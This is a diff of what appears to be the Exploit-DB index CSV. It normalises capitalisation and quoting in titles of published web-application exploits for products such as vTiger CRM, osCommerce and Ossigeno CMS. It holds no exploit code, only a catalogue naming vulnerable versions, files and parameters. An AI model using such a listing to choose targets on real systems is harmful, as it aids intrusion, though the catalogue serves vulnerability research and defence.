(Python)",2010-10-04,ZoRLu,asp,webapps,0 +15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure",2010-10-04,ZoRLu,asp,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15185,platforms/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0 @@ -25241,7 +25244,7 @@ id,file,description,date,author,platform,type,port 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 -16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 +16280,platforms/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 @@ -26088,7 +26091,7 @@ id,file,description,date,author,platform,type,port 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0 18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0 -18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 +18770,platforms/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0 18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0 @@ -26615,9 +26618,9 @@ id,file,description,date,author,platform,type,port 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Full Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor (Metasploit)",2012-10-10,Metasploit,php,webapps,0 -21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 -21742,platforms/php/webapps/21742.txt,"template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 -21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 +21740,platforms/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 +21742,platforms/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 +21743,platforms/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",php,webapps,0 21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0 @@ -29095,9 +29098,9 @@ id,file,description,date,author,platform,type,port 26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module - record Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 -26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 -26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 +26584,platforms/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 +26585,platforms/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 +26586,platforms/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 @@ -29292,7 +29295,7 @@ id,file,description,date,author,platform,type,port 26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php' album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - Advertiser_statistic.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 -26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - View_Results.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 +26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0 26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 26818,platforms/php/webapps/26818.txt,"News Module for Envolution - modules.php Multiple Parameter Cross-Site Scripting",2005-12-14,X1ngBox,php,webapps,0 @@ -29667,7 +29670,7 @@ id,file,description,date,author,platform,type,port 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 -27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 +27279,platforms/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -30438,7 +30441,7 @@ id,file,description,date,author,platform,type,port 28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -30471,8 +30474,8 @@ id,file,description,date,author,platform,type,port 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - 'admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 @@ -30702,20 +30705,20 @@ id,file,description,date,author,platform,type,port 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 -28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - admin/banner_manager.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - admin/banner_statistics.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - admin/countries.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - admin/currencies.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - admin/languages.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - admin/manufacturers.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - admin/products_expected.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - admin/reviews.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - admin/specials.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - admin/stats_products_purchased.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - admin/stats_products_viewed.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - admin/tax_classes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - admin/tax_rates.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 @@ -31079,7 +31082,7 @@ id,file,description,date,author,platform,type,port 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 -29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - hata.asp hata Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 +29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - existepseudo.php pseudo Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -31968,7 +31971,7 @@ id,file,description,date,author,platform,type,port 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0 -30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 +30638,platforms/php/webapps/30638.txt,"GForge 4.6/4.5/3.1 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 @@ -32082,11 +32085,11 @@ id,file,description,date,author,platform,type,port 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -32985,7 +32988,7 @@ id,file,description,date,author,platform,type,port 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 -32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 +32213,platforms/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 @@ -33045,7 +33048,7 @@ id,file,description,date,author,platform,type,port 32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,asp,webapps,0 32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",php,webapps,0 32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0 -32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 +32307,platforms/php/webapps/32307.txt,"vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 32308,platforms/php/webapps/32308.txt,"GenPortal - 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,php,webapps,0 32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",php,webapps,0 32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Parameter Cross-Site Scripting",2008-09-02,Am!r,php,webapps,0 @@ -34455,7 +34458,7 @@ id,file,description,date,author,platform,type,port 34797,platforms/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 34781,platforms/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 -34798,platforms/php/webapps/34798.txt,"ITS SCADA 'Username' - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 +34798,platforms/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 @@ -34917,10 +34920,10 @@ id,file,description,date,author,platform,type,port 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusion",2011-04-04,KedAns-Dz,php,webapps,0 35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",php,webapps,0 35572,platforms/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",php,webapps,0 -35574,platforms/php/webapps/35574.txt,"vtiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0 +35574,platforms/php/webapps/35574.txt,"vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0 -35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 +35577,platforms/php/webapps/35577.txt,"vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0 35579,platforms/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 @@ -35311,9 +35314,9 @@ id,file,description,date,author,platform,type,port 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 